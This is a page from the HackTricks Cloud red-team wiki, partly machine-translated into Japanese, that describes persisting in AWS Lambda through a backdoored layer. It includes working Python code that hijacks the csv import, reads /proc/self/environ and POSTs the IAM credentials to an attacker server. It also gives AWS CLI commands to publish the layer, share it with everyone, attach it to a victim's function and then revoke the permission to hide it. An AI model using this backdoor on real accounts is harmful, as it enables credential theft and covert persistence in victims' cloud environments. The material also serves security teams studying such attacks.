AWS - Lambda Layers Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Lambda Layers

Lambdaレイヤーは、追加のコードやその他のコンテンツを含むことができる.zipファイルアーカイブです。レイヤーには、ライブラリ、カスタムランタイム、データ、または設定ファイルを含めることができます。

関数ごとに最大五つのレイヤーを含めることが可能です。関数にレイヤーを含めると、**内容は実行環境の/opt**ディレクトリに抽出されます。

デフォルトでは、作成したレイヤーはあなたのAWSアカウントにプライベートです。レイヤーを他のアカウントと共有するか、レイヤーを公開することを選択できます。あなたの関数が異なるアカウントが公開したレイヤーを使用している場合、レイヤーが削除された後や、レイヤーへのアクセス権が取り消された後でも、あなたの関数はレイヤーのバージョンを引き続き使用できます。ただし、削除されたレイヤーバージョンを使用して新しい関数を作成したり、関数を更新したりすることはできません。

コンテナイメージとしてデプロイされた関数はレイヤーを使用しません。代わりに、イメージをビルドする際に、好みのランタイム、ライブラリ、およびその他の依存関係をコンテナイメージにパッケージします。

Python load path

Pythonがlambdaで使用するロードパスは次のとおりです:

['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']

チェックしてみてください、第二および第三の位置は、lambda layersがファイルを解凍するディレクトリで占められています：/opt/python/lib/python3.9/site-packagesおよび/opt/python

もし攻撃者が使用されているlambda layerにバックドアを仕掛けたり、一般的なライブラリが読み込まれたときに任意のコードを実行するものを追加した場合、彼は各lambda呼び出しで悪意のあるコードを実行できるようになります。

したがって、要件は次のとおりです：

被害者のコードによって読み込まれるライブラリを確認する
カスタムコードを実行し、元のライブラリを読み込むためのlambda layersを持つ**プロキシライブラリを作成する。

プリロードされたライブラリ

この技術を悪用する際に、私は困難に直面しました：いくつかのライブラリは、あなたのコードが実行されるときにpythonランタイムにすでに読み込まれています。私はosやsysのようなものを見つけることを期待していましたが、jsonライブラリさえも読み込まれていました。この永続性技術を悪用するためには、コードが実行されるときに読み込まれていない新しいライブラリを読み込む必要があります。

このようなpythonコードを使えば、lambda内のpythonランタイムにプリロードされたライブラリのリストを取得することができます：

import sys

def lambda_handler(event, context):
return {
'statusCode': 200,
'body': str(sys.modules.keys())
}

そして、これはリストです（osやjsonのようなライブラリがすでに存在することを確認してください）

'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'

そして、これはlambdaがデフォルトでインストールしているライブラリのリストです: https://gist.github.com/gene1wood/4a052f39490fae00e0c3

Lambdaレイヤーのバックドア

この例では、ターゲットコードが**csvをインポートしていると仮定します。私たちはcsvライブラリのインポートにバックドアを仕掛ける**つもりです。

そのために、/opt/python/lib/python3.9/site-packagesにcsvというディレクトリを作成し、その中に**__init__.pyファイルを置きます。 その後、lambdaが実行されてcsvを読み込もうとすると、私たちの__init__.pyファイルが読み込まれ、実行されます**。このファイルは以下を行う必要があります:

私たちのペイロードを実行する
元のcsvライブラリを読み込む

私たちは両方を次のように行うことができます:

import sys
from urllib import request

with open("/proc/self/environ", "rb") as file:
url= "https://attacker13123344.com/" #Change this to your server
req = request.Request(url, data=file.read(), method="POST")
response = request.urlopen(req)

# Remove backdoor directory from path to load original library
del_path_dir = "/".join(__file__.split("/")[:-2])
sys.path.remove(del_path_dir)

# Remove backdoored loaded library from sys.modules
del sys.modules[__file__.split("/")[-2]]

# Load original library
import csv as _csv

sys.modules["csv"] = _csv

Then, create a zip with this code in the path python/lib/python3.9/site-packages/__init__.py and add it as a lambda layer.

You can find this code in https://github.com/carlospolop/LambdaLayerBackdoor

The integrated payload will 最初に呼び出されたとき、またはlambdaコンテナのリセット後にIAMクレデンシャルをサーバーに送信します（コードの変更またはコールドラムダ）、しかし他の技術も以下のように統合することができます：

AWS - Steal Lambda Requests

External Layers

Note that it's possible to use 外部アカウントからのlambdaレイヤー。さらに、lambdaは権限がなくても外部アカウントのレイヤーを使用できます。 Also note that the lambdaが持てるレイヤーの最大数は5です。

Therefore, in order to improve the versatility of this technique an attacker could:

ユーザーの既存のレイヤーにバックドアを仕掛ける（外部のものは何もない）
自分のアカウントに レイヤーを作成し、**被害者アカウントにレイヤーを使用するアクセスを与え、被害者のLambdaに レイヤーを設定し、 権限を削除する。
Lambdaはレイヤーを使用し続けることができ、被害者はレイヤーのコードを簡単にダウンロードする方法がありません（ラムダ内でリバースシェルを取得することを除いて）
被害者は**aws lambda list-layersを使用して外部レイヤーを確認できません**。

# Upload backdoor layer
aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"

# Give everyone access to the lambda layer
## Put the account number in --principal to give access only to an account
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion

## Add layer to victims Lambda

# Remove permissions
aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

PreviousAWS - Abusing Lambda Extensions NextAWS - Lightsail Persistence

Last updated 3 days ago